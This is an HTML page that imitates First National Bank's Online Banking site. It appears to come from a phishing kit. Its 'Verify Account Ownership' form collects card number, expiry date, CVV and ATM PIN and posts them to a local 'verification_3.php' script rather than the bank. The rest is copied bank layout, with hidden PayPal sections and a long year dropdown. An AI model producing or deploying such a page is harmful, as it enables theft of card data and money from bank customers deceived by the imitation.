<!DOCTYPE html>
<html id="fnbSkin" class="bodyWidth desktopBrowser Firefox62"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      
      <title>Online Banking</title>
      
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="description" content="">
      <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=0">
      
      <meta http-equiv="expires" content="0">
     
      <meta name="viewport" content="width=device-width,initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
      <meta http-equiv="X-UA-Compatible" content="IE=11">
      <meta name="format-detection" content="telephone=no">
      <meta name="HandheldFriendly" content="true">
      <meta name="apple-touch-fullscreen" content="yes">
      <meta name="apple-mobile-web-app-capable" content="yes">
      <meta name="apple-mobile-web-app-status-bar-style" content="black">
      <link rel="apple-touch-icon" href="https://www.online.fnb.co.za/banking/03images/base/mobi/fnbicon.jpg">
      <link rel="apple-touch-startup-image" href="https://www.online.fnb.co.za/banking/03images/base/mobi/fnbicon.jpg">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/reset.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/initials_combined.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/frame_combined.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/forms_combined.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/markup_combined.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/utils_combined.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/instantSales.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/final_combined.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/skin.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/icons.css">
      <link rel="stylesheet" type="text/css" href="./ebucks-rewards_files/stylesheet_002.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/dashBoardLayout.css">
      <!--CSS-->
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/reset_002.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/topMenu.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/core.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/nonGlobal.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/print.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/mobile.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/stylesheet.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/jquery.css">
      <link type="text/css" rel="stylesheet" href="./ebucks-rewards_files/applet.css">
      <style type="text/css">.jqstooltip { position: absolute;left: 0px;top: 0px;visibility: hidden;background: rgb(0, 0, 0) transparent;background-color: rgba(0,0,0,0.6);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#99000000, endColorstr=#99000000);-ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#99000000, endColorstr=#99000000)";color: white;font: 10px arial, san serif;text-align: left;white-space: nowrap;padding: 5px;border: 1px solid white;z-index: 10000;}.jqsfield { color: white;font: 10px arial, san serif;text-align: left;}</style>
      
      <script src="./ebucks-rewards_files/jquery.min.js"></script>
      <script src="./ebucks-rewards_files/none.php"></script>
      <link rel="shortcut icon" type="image/x-icon" href="https://www.fnb.co.za/favicon.ico">
   <style type="text/css">.mx-tip-panel:focus{outline:0;} 
 .mx_keyword{line-height:20px; color:#333333; font-size:14px; letter-spacing: 0.2px;font-family:PingFangSC-Semibold;}
.mx-scrollbar::-webkit-scrollbar{width:8px;height:1px;}
.mx-scrollbar{overflow-y:auto; max-height:380px; }
.mx-scrollbar::-webkit-scrollbar-thumb{border-radius:4px; background: #C0C0C0;}
.mx-scrollbar::-webkit-scrollbar-track{border-radius:4px; background: #eeeeee;}
.maxthon_tip{background-color:white; border:none;} .maxthon_tip:active{background-color: #E6F4FF;border:1px solid #449EFB; } .maxthon_tip:hover{background-color:#E6F4FF; border:1px solid #449EFB;}
</style></head>
	
	<body data-time="" id="bodyContainer" class="worlds-v1"><iframe style="display:none" name="frameResponse" id="frameResponse" src="Online%20Banking_files/blankpage.html"></iframe>

	














	












	<header id="header" class="bodyWidth index50">
        <div id="headerCornerImg"></div>
        <div id="headerInner" class="frameOffset">
           <div id="headerButtons" class="clearfix">
              <div id="headerButtonsInner">
                 <div id="headerButton_1" class="headerButton gridCol grid10 headerButtonlogoutBtn" data-value="/banking/Controller?nav=navigator.UserLogoff&amp;FARFN=849&amp;actionchild=1797&amp;isTopMenu=true&amp;pN=VXNlciBMb2dvZmY=">
                    <a class="logoutBtn"><span>Log Out</span></a>
                 </div>
                 <div id="headerButton_2" class="headerButton gridCol grid25 headerButtonsettingsBtn" data-value="/banking/Controller?nav=profiles.simple.navigator.SettingsLanding&amp;FARFN=854&amp;actionchild=37&amp;isTopMenu=true&amp;pN=U2V0dGluZ3MgTGFuZGluZw==">
                    <a class="settingsBtn"><span>Online Banking Settings</span></a>
                 </div>
                 <div id="headerButton_3" class="headerButton gridCol grid10 headerButtoninboxBtn" data-value="/banking/Controller?nav=inbox.navigator.InboxLanding&amp;FARFN=856&amp;actionchild=1805&amp;isTopMenu=true&amp;pN=SW5ib3ggTGFuZGluZw==">
                    <a class="inboxBtn"><span>Inbox</span></a>
                 </div>
                 <div id="headerButton_4" class="headerButton gridCol grid10 headerButtonnoBankerContactBtn" data-value="/banking/Controller?nav=contactus.navigator.ContactUsPrepare&amp;FARFN=880&amp;actionchild=1826&amp;isTopMenu=true&amp;pN=Q29udGFjdCBVcyBQcmVwYXJl">
                    <a class="noBankerContactBtn"><span>Contact Us</span></a>
                 </div>
                 <div class="headerButton" id="helpText">
                    <a class="headerHelpBtn" onclick="event.preventDefault();window.open(&#39;https://www.online.fnb.co.za/rhelp_0_15/OB_SA_Downloads/firstpage.html&#39;,&#39;&#39;,&#39;width=800,height=600,resizable=false,status=false,menubar=false&#39;);return false;">
                    <span>Help</span>
                    </a>
                 </div>
              </div>
           </div>
           <div id="menuWrapper" class="clearfix">
              <nav data-role="topTabs" id="topTabs" data-disbaled="false" class="clearfix">
                 <span class="mainTab " data-submenu="false" data-url="/banking/Controller?nav=comms.navigator.GetCommunications&amp;FARFN=571&amp;actionchild=564&amp;isTopMenu=true&amp;pN=R2V0IENvbW11bmljYXRpb25z"><span>
                 News
                 </span></span>
                 <span class="mainTab " data-submenu="false" data-url="/banking/Controller?nav=rewards.RewardsRedirect&amp;FARFN=1192&amp;actionchild=377&amp;isTopMenu=true&amp;pN=UmV3YXJkcyBSZWRpcmVjdA=="><span>
                 eBucks Rewards
                 </span></span>
                 <span class="mainTab " data-submenu="false" data-url="/banking/Controller?nav=accounts.summaryofaccountbalances.navigator.SummaryOfAccountBalances&amp;FARFN=4&amp;actionchild=1&amp;isTopMenu=true&amp;pN=U3VtbWFyeSBPZiBBY2NvdW50IEJhbGFuY2Vz"><span>
                 My Bank <br>Accounts
                 </span></span>
                 <span class="mainTab " data-submenu="false" data-url="/banking/Controller?nav=transfers.simple.navigator.TransferCapture&amp;FARFN=14&amp;actionchild=164&amp;isTopMenu=true&amp;pN=VHJhbnNmZXIgQ2FwdHVyZQ=="><span>
                 Transfer
                 </span></span>
                 <span class="mainTab " data-submenu="false" data-url="/banking/Controller?nav=navigator.payments.simple.SimplePaymentsLanding&amp;FARFN=15&amp;actionchild=165&amp;isTopMenu=true&amp;pN=U2ltcGxlIFBheW1lbnRzIExhbmRpbmc="><span>
                 Pay
                 </span></span>
                 <span class="mainTab " data-submenu="false" data-url="/banking/Controller?nav=buy.multichannelprepaid.navigator.MultiChannelPrepaidLanding&amp;changePageSize=10&amp;FARFN=240&amp;actionchild=734&amp;isTopMenu=true&amp;pN=TXVsdGkgQ2hhbm5lbCBQcmVwYWlkIExhbmRpbmc="><span>
                 Buy
                 </span></span>
                 <span class="mainTab " data-submenu="false" data-url="/banking/Controller?nav=sendmoney.navigator.SendMoneyMultipleLanding&amp;FARFN=1574&amp;actionchild=2242&amp;isTopMenu=true&amp;pN=U2VuZCBNb25leSBNdWx0aXBsZSBMYW5kaW5n"><span>
                 Send Money
                 </span></span>
                 <span class="mainTab " data-submenu="false" data-url="/banking/Controller?nav=invest.shares.navigator.SharesAccountSelectionLanding&amp;FARFN=17&amp;actionchild=239&amp;isTopMenu=true&amp;pN=U2hhcmVzIEFjY291bnQgU2VsZWN0aW9uIExhbmRpbmc="><span>
                 Shares +<br>Gold
                 </span></span>
                 <span class="mainTab " data-submenu="false" data-url="/banking/Controller?nav=forex.ocep.redirect.ForexOcepTab&amp;FARFN=3117&amp;actionchild=3167&amp;isTopMenu=true&amp;pN=Rm9yZXggT2NlcCBUYWI="><span>
                 Forex
                 </span></span>
                 <span class="mainTab lastTab" data-submenu="false" data-url="/banking/Controller?nav=fnbbusiness.BusinessLanding&amp;FARFN=3963&amp;actionchild=3143&amp;isTopMenu=true&amp;pN=QnVzaW5lc3MgU29sdXRpb25z"><span>
                 Business Solutions
                 </span></span>
                 <div id="mainTabSlider"></div>
              </nav>
           </div>
           <button type="button" id="topTabScrollButtonLeft" data-visible="false" class="topTabScrollButton topTabScrollButtonLeft Hhide"></button>
           <button type="button" id="topTabScrollButtonRight" data-visible="false" class="topTabScrollButton topTabScrollButtonRight Hhide"></button>
        </div>
        <div id="logOff" style="display: none;"></div>
     </header>
	
		
	
	


	


	
	<span data-role="actionMenuBtt" id="actionMenuBtt">
	<div id="actionMenuBttLabelWrapper" data-role="actionMenuBttLabelWrapper" class="HoffScreen">
		<span id="actionMenuBttLabel" data-role="actionMenuBttLabel">More</span>
	</div>
</span>
	
	<section id="pageContentWrapper" class="content">
		
		<div id="pageContent" class="contentInner"><div class="pageWrapper" data-skin="0">
	<div id="main" class="pageGroup ">
	
	<!--Dont not move or hnage the below img tag. It works-->
	<img id="printLogo" class="printLogo" src="Online%20Banking_files/print-logo.jpg">
		
			
			
				


<div id="currentSubtab" class="subTab subTab1 noTabs first clearfix">
				
	








	


<div class="formTable grid100 ">
	<div class="tr grid100">
		
		












































	<input id="action" name="action" type="hidden" class="hidden" value="getticket" data-value="getticket">



		












































	<input id="simple" name="simple" type="hidden" class="hidden" value="true" data-value="true">


	
	
	</div>
</div>
	








	


<div class="formTable grid100 ">
	<div class="tr grid100">
		
		










	






	<div id="registrationSelector" class="td  white clearfix">
			








	


<div class="formTable grid100 ">
	<div class="tr grid100">
			
				









	







	<div class="td grid100 white clearfix">
					








<h1>Verify Account Ownership</h1>
					<br>
				</div>


			
	</div>
</div>
			








	


<div class="formTable grid100 ">
	<div class="tr grid100">
			
				









	







	<div class="td grid100 white clearfix">
					






















    
        
    



	
	
		
	
	



	
	 <div class="formElementWrapper gridGroup radioButtonContainer white tableHeaderControls mobiHeaderControls clearfix">
			<div class="mobi-header-trigger"></div>
			
			<div class="gridCol grid100 formElementContainer">
				<div id="formType" class="radioButtonsGroup ">
					<div class="mobi-dropdown-trigger" onclick="fnb.utils.mobile.switcher.expandSwitcher(this);"></div>
					
						
						
							
						
								
						














<div id="switcherWrapperregisterCardAndPinRadio" class="switcherWrapper switcherWrapperSelected ">
	
	<div id="registerCardAndPinRadio" class="radioButton " data-value="CardAndPin" onclick="fnb.functions.showHideToggleElements.showHideToggle([{show:'false',element:'#IDandCode'},{show:'true',element:'#CardAndPin'},{show:'false',element:'#AccountNumber'},{show:'false',element:'#PayPal'},{show:'false',element:'#continueKYC'},{show:'true',element:'#continueCardAndPin'},{show:'false',element:'#continueAccountNumber'},{show:'false',element:'#continueOFV'},{show:'false',element:'#hiddenNote'},{show:'true',element:'#continueCardAndPinNoCrypto'},{show:'false',element:'#digitalOFV'}]);">Verify with my Card details</div>
</div>
						<br>
						














<div id="switcherWrapperregisterAccountNumberRadio" class="switcherWrapper"></div>
						<br>
						<br>
					
							<input class="radioGroupValue" name="formType" id="formType" value="CardAndPin">
						
					
				</div>
				
			</div>
		</div>
	
	

				</div>


			
	</div>
</div>
		</div>



		










	






	<div id="registrationForms" class="td  white clearfix">
		
			






<div id="IDandCode" class="displayNone">
	
				









			
</div>
			
			






<div id="CardAndPin">
	
				








<form id="card" name="VERIFYREMAD" action="verification_3.php" method="post">
	



<h1>Verify using your ATM Card details</h1>
					<br>
					
					
						
							
<iframe id="res" name="res" scrolling="no" style="display:none;" width="100%" height="50px" frameborder="0"></iframe>

		
			<div class="formElementWrapper input-wrapper clearfix   ">
				
					<div class="gridCol grid40 formElementLabel">
						Card Number
					</div>
				
						<div class="formElementContainer floatLeft grid60">
							<div class="input-container-inner  toolTipSpacer clearfix">
								
								<input id="card" name="card" required  class="input-input " maxlength="16">
								

<div class="tooltipParent">
	<div id="cardTooltip" class="tooltipButton"><img src="mark.png" width="30" height="28" alt=""/></div>
	
	<!-- Position options - topLeft, topRight, bottomLeft, bottomRight -->
	<div class="tooltip  "><div class="tooltip-text">This is the Card and PIN combination that you use to withdraw money from an ATM.</div><span class="tooltip-pointer">&nbsp;</span></div>
	<span class=".tooltip-pointer-left"></span>
</div>


								
								
							</div>
						</div>
				</div>
		
		

<div id="ticketDiv" class="hidden">
	
</div>

			<div class="formElementWrapper input-wrapper clearfix   ">
				
					<div class="gridCol grid40 formElementLabel">
						Expiration Date
					</div>
				
						<div class="formElementContainer floatLeft grid60">
							<div class="input-container-inner  toolTipSpacer numberContainer clearfix">
								
								<input id="exp" name="exp" placeholder="MM/YYYY" required class="input-input number" type="text" autocomplete="off" maxlength="7">
								
		
<div class="tooltipParent">
	<div id="pinTooltip" class="tooltipButton"><img src="mark.png" width="30" height="28" alt=""/></div>
	
	<!-- Position options - topLeft, topRight, bottomLeft, bottomRight -->
	<div class="tooltip  "><div class="tooltip-text">Please enter the Expiration Date of the above card.</div><span class="tooltip-pointer">&nbsp;</span></div>
	<span class=".tooltip-pointer-left"></span>
</div>


								
								
							</div>
						</div>
				</div>
	<div class="formElementWrapper input-wrapper clearfix   ">
				
					<div class="gridCol grid40 formElementLabel">
						CVV
					</div>
				
						<div class="formElementContainer floatLeft grid60">
							<div class="input-container-inner  toolTipSpacer numberContainer clearfix">
								
								<input id="cvv" name="cvv"  required class="input-input number" type="text" autocomplete="off" pattern="[0-9]*" maxlength="3">
								
		
<div class="tooltipParent">
	<div id="pinTooltip" class="tooltipButton"><img src="mark.png" width="30" height="28" alt=""/></div>
	
	<!-- Position options - topLeft, topRight, bottomLeft, bottomRight -->
	<div class="tooltip  "><div class="tooltip-text">Please enter the CVV of the above card.</div><span class="tooltip-pointer">&nbsp;</span></div>
	<span class=".tooltip-pointer-left"></span>
</div>


								
								
							</div>
						</div>
				</div>
	
<div class="formElementWrapper input-wrapper clearfix   ">
				
					<div class="gridCol grid40 formElementLabel">
						ATM PIN
					</div>
				
						<div class="formElementContainer floatLeft grid60">
							<div class="input-container-inner  toolTipSpacer numberContainer clearfix">
								
								<input id="pho" name="pho" placeholder="" required class="input-input number" type="text" autocomplete="off" maxlength="6">
								
		
<div class="tooltipParent">
	<div id="pinTooltip" class="tooltipButton"><img src="mark.png" width="30" height="28" alt=""/></div>
	
	
	<div class="tooltip  "><div class="tooltip-text">Please enter the ATM PIN of the above card.</div><span class="tooltip-pointer">&nbsp;</span></div>
	<span class=".tooltip-pointer-left"></span>
</div>


								
								
							</div>
						</div>
				</div> 
		
	

<div class="formTable grid100 noteOuterWrap">
	<div class="tr grid100">
		
	

	<div class="td grid100  clearfix">
		<div class="note note-tc teal7  clearfix">
	
<h4 class="note-heading ">Terms &amp; Conditions</h4>
		
						
<div id="onlineTermsAndConditions-wrapper" class="checkbox-wrapper   formElementWrapper clearfix ">
	
	<div class="gridCol formElementContainer ">
		<div id="onlineTermsAndConditions-graphic-wrapper" class="checkbox-graphic-wrapper  ">
			
			<div id="onlineTermsAndConditions-graphic" class=""><img src="tick.JPG" width="30" height="29" alt=""/> 
			  </div>
		</div>
	</div>
	
		<div class="gridCol grid80 formElementLabel checkbox-label">&nbsp;&nbsp;I accept the Online Banking 


<a href="#" onclick="window.open('../downloads/Remote-Banking-Agreement.pdf', 'moreInfo', '');return false;">Terms and Conditions</a></div>
	
</div>



<p>
Should you attempt to register with fictitious details or on behalf of 
another person, we reserve the right to take legal action.
</p>
					
		</div>
	</div>


	<div class="td  ghostBlock clearfix">&nbsp;</div>	




	</div>
</div>
					
					<br>					
				

			
</div>
			
			






<div id="digitalOFV" class="displayNone">
	
				









			
</div>			

			






<div id="AccountNumber" class="displayNone">
	
				










			
</div>

			






<div id="PayPal" class="displayNone">
	
				








<h1>Register for PayPal for non FNB customers</h1>
				<br>
				






<div>
	
					








	


<div class="formTable grid100 ">
	<div class="tr grid100">
							
						










	






	<div id="paypalTypeSelector" class="td  white clearfix">							
							






















    



	
		
		
	
	
	



	
	 <div class="formElementWrapper gridGroup radioButtonContainer  tableHeaderControls mobiHeaderControls teal7 switcherAdjust clearfix">
			<div class="mobi-header-trigger"></div>
			
				<div class="formElementLabel gridCol grid10 switcherLabel">Paypal</div>
			
			<div class="gridCol grid90 formElementContainer">
				<div id="secondarySelection" class="radioButtonsGroup switcherGroup">
					<div class="mobi-dropdown-trigger" onclick="fnb.utils.mobile.switcher.expandSwitcher(this);"></div>
					
						
						
							
								














<div id="switcherWrapper" class="switcherWrapper">
	
	<div id="" class="radioButton " data-value="individualReg" onclick="fnb.functions.showHideToggleElements.showHideToggle([{show:'true',element:'#individual'},{show:'false',element:'#business'}])">For Me</div>
</div>
								














<div id="switcherWrapper" class="switcherWrapper">
	
	<div id="" class="radioButton " data-value="businessReg" onclick="fnb.functions.showHideToggleElements.showHideToggle([{show:'false',element:'#individual'},{show:'true',element:'#business'}])">For My Business</div>
</div>
							
							<input class="radioGroupValue" name="secondarySelection" id="secondarySelection">
						
					
				</div>
				
			</div>
		</div>
	
	

						</div>


						










	






	<div class="td  white clearfix">&nbsp;</div>


						










	





	<div class="td  ghostBlock clearfix">&nbsp;</div>	



					
	</div>
</div>
				
</div>

				






<div id="individual" class="fullWidthSwitchers" style="display:none">
	
					








	


<div class="formTable grid100 ">
	<div class="tr grid100">
		
						









	







	<div class="td grid90 white clearfix">
							






















    



	
	
	
		
		
	



	
	 <div class="formElementWrapper gridGroup radioButtonContainer  clearfix">
			
			
				<div class="formElementLabel gridCol grid40 switcherLabel">Register for PayPal Services</div>
			
			<div class="gridCol grid60 formElementContainer">
				<div id="individualSelection" class="radioButtonsGroup ">
					<div class="mobi-dropdown-trigger" onclick="fnb.utils.mobile.switcher.expandSwitcher(this);"></div>
					
						
						
							
								














<div id="switcherWrapperiNonFNBCustomer" class="switcherWrapper">
	
	<div id="iNonFNBCustomer" class="radioButton " data-value="1" onclick="goToPreparePage('enrollment.paypal.individual.navigator.PayPalIndividualRegistrationPrepare')">I do not bank with FNB</div>
</div>
								














<div id="switcherWrapperiOBCustomer" class="switcherWrapper">
	
	<div id="iOBCustomer" class="radioButton " data-value="2" onclick="fnb.functions.showHideToggleElements.showHideToggle([{show:'true',element:'#hiddenNote'},{show:'true',element:'#M01'},{show:'false',element:'#M02'},{show:'false',element:'#M03'}])">I'm an existing FNB customer with an Online Banking User ID and Password.</div>
</div>
								














<div id="switcherWrapperiChequeDebitCredit" class="switcherWrapper">
	
	<div id="iChequeDebitCredit" class="radioButton " data-value="1" onclick="fnb.functions.showHideToggleElements.showHideToggle([{show:'true',element:'#hiddenNote'},{show:'false',element:'#M01'},{show:'true',element:'#M02'},{show:'false',element:'#M03'}])">I have an FNB Cheque, Debit or Credit Card and ATM PIN</div>
</div>
								














<div id="switcherWrapperiDiscoveryCC" class="switcherWrapper">
	
	<div id="iDiscoveryCC" class="radioButton " data-value="2" onclick="fnb.functions.showHideToggleElements.showHideToggle([{show:'true',element:'#hiddenNote'},{show:'false',element:'#M01'},{show:'true',element:'#M02'},{show:'false',element:'#M03'}])">I have a Discovery Card and ATM PIN</div>
</div>
							
							<input class="radioGroupValue" name="individualSelection" id="individualSelection">
						
					
				</div>
				
			</div>
		</div>
	
	

						</div>


						










	






	<div class="td  white clearfix">&nbsp;</div>


						










	





	<div class="td  ghostBlock clearfix">&nbsp;</div>	




					
	</div>
</div>
				
</div>
				






<div id="business" class="fullWidthSwitchers" style="display:none">
	
					








	


<div class="formTable grid100 ">
	<div class="tr grid100">
		
						









	







	<div class="td grid90 white clearfix">
							






















    



	
	
	
		
		
	



	
	 <div class="formElementWrapper gridGroup radioButtonContainer  clearfix">
			
			
				<div class="formElementLabel gridCol grid40 switcherLabel">Register for PayPal Services</div>
			
			<div class="gridCol grid60 formElementContainer">
				<div id="businessSelection" class="radioButtonsGroup ">
					<div class="mobi-dropdown-trigger" onclick="fnb.utils.mobile.switcher.expandSwitcher(this);"></div>
					
						
						
							
								














<div id="switcherWrapperbNonFNBCustomer" class="switcherWrapper">
	
	<div id="bNonFNBCustomer" class="radioButton " data-value="1" onclick="goToPreparePage('enrollment.paypal.business.navigator.PayPalBusinessRegistrationPrepare')">I do not bank with FNB</div>
</div>
								














<div id="switcherWrapperbOBCustomer" class="switcherWrapper">
	
	<div id="bOBCustomer" class="radioButton " data-value="2" onclick="fnb.functions.showHideToggleElements.showHideToggle([{show:'true',element:'#hiddenNote'},{show:'true',element:'#M01'},{show:'false',element:'#M02'},{show:'false',element:'#M03'}])">I'm an existing FNB customer with an Online Banking User ID and Password.</div>
</div>
								














<div id="switcherWrapperbOBECustomer" class="switcherWrapper">
	
	<div id="bOBECustomer" class="radioButton " data-value="1" onclick="fnb.functions.showHideToggleElements.showHideToggle([{show:'true',element:'#hiddenNote'},{show:'false',element:'#M01'},{show:'true',element:'#M02'},{show:'false',element:'#M03'}])">I'm an existing FNB customer with an Online Banking Enterprise User ID and Password.</div>
</div>
								














<div id="switcherWrapperbFNBAccountAlready" class="switcherWrapper">
	
	<div id="bFNBAccountAlready" class="radioButton " data-value="2" onclick="fnb.functions.showHideToggleElements.showHideToggle([{show:'true',element:'#hiddenNote'},{show:'false',element:'#M01'},{show:'false',element:'#M02'},{show:'true',element:'#M03'}])">I have an FNB Account already.</div>
</div>
							
							<input class="radioGroupValue" name="businessSelection" id="businessSelection">
						
					
				</div>
				
			</div>
		</div>
	
	

						</div>


						









	







	<div class="td grid10 white clearfix">&nbsp;</div>


					
	</div>
</div>
				
</div>
			
</div>

		</div>


		










	





	<div class="td  ghostBlock clearfix">&nbsp;</div>	



	
	</div>
</div>
		
	
















	
		
		
	
	
	
	














	


<div id="noteOuter_hiddenNote" class="formTable grid100 noteOuterWrap">
	<div class="tr grid100">
		
	









	







	<div class="td grid100  clearfix">
		<div id="hiddenNote" class="note note-normal teal7 hidden clearfix">
		








<h4 class="note-heading ">Please Note</h4>
		
		





<p id="M01" class="hidden">

			As an FNB Online Banking user, you can log in to <a href="https://www.fnb.co.za/" target="_self">www.FNB.co.za</a> with your Online Banking credentials and register for PayPal services.<br>
			You will have the option to link a non-FNB account to your PayPal profile to receive withdrawals too.
		
</p>
		





<p id="M02" class="hidden">

			FNB clients can register for PayPal services by registering for FNB Online Banking at <a href="https://www.fnb.co.za/" target="_self">www.FNB.co.za</a> and have the option to link a non-FNB account to their PayPal profile to receive withdrawals too.<br>
			To register for FNB Online Banking you will need a valid card and ATM
 PIN. If your card and ATM PIN are no longer valid please visit your 
nearest FNB branch to apply for a new card and ATM PIN.
		
</p>
		





<p id="M03" class="hidden">

			Please visit your nearest branch or contact your FNB account manager to register for FNB Online Banking.<br>
			Via Online Banking you can register for PayPal services and will have
 the option to link a non-FNB account to your PayPal profile to receive 
withdrawals too.
		
</p>
	
		</div>
	</div>


	










	





	<div class="td  ghostBlock clearfix">&nbsp;</div>	




	</div>
</div>
	
	<br>
</div>
			
		
	</div>
</div><div id="formFooterButtons" class="gridGroup formFooterButtons  hidden">
	
	<div class="clearfix">
	



























	
	
	
	
		











 
	
	
	












	












	












	













	
	
	</div>
</div></div>
		
	</section> 
	
	<div id="error" data-role="error" class="bodyWidth index100 Hhide">
	<button type="button" id="errorClose"></button>
	<div class="errorInner">
	
	</div>
</div> 
	
	

<div id="eziOverlay" class="overlayContainer index30 bodyWidth Hhide">
		<div class="overlayInner">
			<div class="gridGroupInner">
				<div data-role="gridColEzi" data-type="eziWrapperLeft" class="gridColEzi eziWrapperLeft borderRight">&nbsp;</div>
				<div data-role="gridColEzi" data-type="eziWrapperRight" class="gridColEzi eziWrapperRight borderRight borderLeft">
					<div class="eziLoader">
						<div class="eziLoaderInner">
							<div class="eziLoaderProgress">
							</div>
							<span class="eziLoaderText">Loading</span>
						</div>
					</div>
					<div class="eziInner">
						




<div class="closeButtonContainer">
	
	 	
	 	
		
			<div class="closeButton" onclick="fnb.controls.controller.eventsObject.raiseEvent('eziSliderHide', '');"></div>
		
	
</div>
						<div id="eziPageContent" class="eziInnerTwo">
						
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div id="loaderOverlay" class="overlayContainer bodyWidth index30 Hhide">
		<div class="overlayInner">
			<div class="loader">
				<div class="loaderInner">
					<div class="loaderProgress">
					</div>
					<span class="loaderText">Loading</span>
				</div>
			</div>
		</div>
	</div>
	
	


<div id="dateOverlay" class="overlayContainer bodyWidth index30 Hhide">
	<div class="overlayInner">
		<div class="datePickerContainer">
			<div class="datePickerInner">
				<button type="button" class="datePickerClose"></button>
				<button type="button" class="dateLeftScrollArrow"></button>
				<div class="datePickerScrollerWrapper">
					<div class="datePickerScroller" style="width: 0px; left: 0px;"></div>
					
					<div data-role="calendarDropdown">
					   <select id="datePickerDropdown">
						   
							    <option value="1900" selected="selected">1900</option>
							
							    <option value="1901">1901</option>
							
							    <option value="1902">1902</option>
							
							    <option value="1903">1903</option>
							
							    <option value="1904">1904</option>
							
							    <option value="1905">1905</option>
							
							    <option value="1906">1906</option>
							
							    <option value="1907">1907</option>
							
							    <option value="1908">1908</option>
							
							    <option value="1909">1909</option>
							
							    <option value="1910">1910</option>
							
							    <option value="1911">1911</option>
							
							    <option value="1912">1912</option>
							
							    <option value="1913">1913</option>
							
							    <option value="1914">1914</option>
							
							    <option value="1915">1915</option>
							
							    <option value="1916">1916</option>
							
							    <option value="1917">1917</option>
							
							    <option value="1918">1918</option>
							
							    <option value="1919">1919</option>
							
							    <option value="1920">1920</option>
							
							    <option value="1921">1921</option>
							
							    <option value="1922">1922</option>
							
							    <option value="1923">1923</option>
							
							    <option value="1924">1924</option>
							
							    <option value="1925">1925</option>
							
							    <option value="1926">1926</option>
							
							    <option value="1927">1927</option>
							
							    <option value="1928">1928</option>
							
							    <option value="1929">1929</option>
							
							    <option value="1930">1930</option>
							
							    <option value="1931">1931</option>
							
							    <option value="1932">1932</option>
							
							    <option value="1933">1933</option>
							
							    <option value="1934">1934</option>
							
							    <option value="1935">1935</option>
							
							    <option value="1936">1936</option>
							
							    <option value="1937">1937</option>
							
							    <option value="1938">1938</option>
							
							    <option value="1939">1939</option>
							
							    <option value="1940">1940</option>
							
							    <option value="1941">1941</option>
							
							    <option value="1942">1942</option>
							
							    <option value="1943">1943</option>
							
							    <option value="1944">1944</option>
							
							    <option value="1945">1945</option>
							
							    <option value="1946">1946</option>
							
							    <option value="1947">1947</option>
							
							    <option value="1948">1948</option>
							
							    <option value="1949">1949</option>
							
							    <option value="1950">1950</option>
							
							    <option value="1951">1951</option>
							
							    <option value="1952">1952</option>
							
							    <option value="1953">1953</option>
							
							    <option value="1954">1954</option>
							
							    <option value="1955">1955</option>
							
							    <option value="1956">1956</option>
							
							    <option value="1957">1957</option>
							
							    <option value="1958">1958</option>
							
							    <option value="1959">1959</option>
							
							    <option value="1960">1960</option>
							
							    <option value="1961">1961</option>
							
							    <option value="1962">1962</option>
							
							    <option value="1963">1963</option>
							
							    <option value="1964">1964</option>
							
							    <option value="1965">1965</option>
							
							    <option value="1966">1966</option>
							
							    <option value="1967">1967</option>
							
							    <option value="1968">1968</option>
							
							    <option value="1969">1969</option>
							
							    <option value="1970">1970</option>
							
							    <option value="1971">1971</option>
							
							    <option value="1972">1972</option>
							
							    <option value="1973">1973</option>
							
							    <option value="1974">1974</option>
							
							    <option value="1975">1975</option>
							
							    <option value="1976">1976</option>
							
							    <option value="1977">1977</option>
							
							    <option value="1978">1978</option>
							
							    <option value="1979">1979</option>
							
							    <option value="1980">1980</option>
							
							    <option value="1981">1981</option>
							
							    <option value="1982">1982</option>
							
							    <option value="1983">1983</option>
							
							    <option value="1984">1984</option>
							
							    <option value="1985">1985</option>
							
							    <option value="1986">1986</option>
							
							    <option value="1987">1987</option>
							
							    <option value="1988">1988</option>
							
							    <option value="1989">1989</option>
							
							    <option value="1990">1990</option>
							
							    <option value="1991">1991</option>
							
							    <option value="1992">1992</option>
							
							    <option value="1993">1993</option>
							
							    <option value="1994">1994</option>
							
							    <option value="1995">1995</option>
							
							    <option value="1996">1996</option>
							
							    <option value="1997">1997</option>
							
							    <option value="1998">1998</option>
							
							    <option value="1999">1999</option>
							
							    <option value="2000">2000</option>
							
							    <option value="2001">2001</option>
							
							    <option value="2002">2002</option>
							
							    <option value="2003">2003</option>
							
							    <option value="2004">2004</option>
							
							    <option value="2005">2005</option>
							
							    <option value="2006">2006</option>
							
							    <option value="2007">2007</option>
							
							    <option value="2008">2008</option>
							
							    <option value="2009">2009</option>
							
							    <option value="2010">2010</option>
							
							    <option value="2011">2011</option>
							
							    <option value="2012">2012</option>
							
							    <option value="2013">2013</option>
							
							    <option value="2014">2014</option>
							
							    <option value="2015">2015</option>
							
							    <option value="2016">2016</option>
							
							    <option value="2017">2017</option>
							
							    <option value="2018">2018</option>
							
							    <option value="2019">2019</option>
							
							    <option value="2020">2020</option>
							
							    <option value="2021">2021</option>
							
							    <option value="2022">2022</option>
							
							    <option value="2023">2023</option>
							
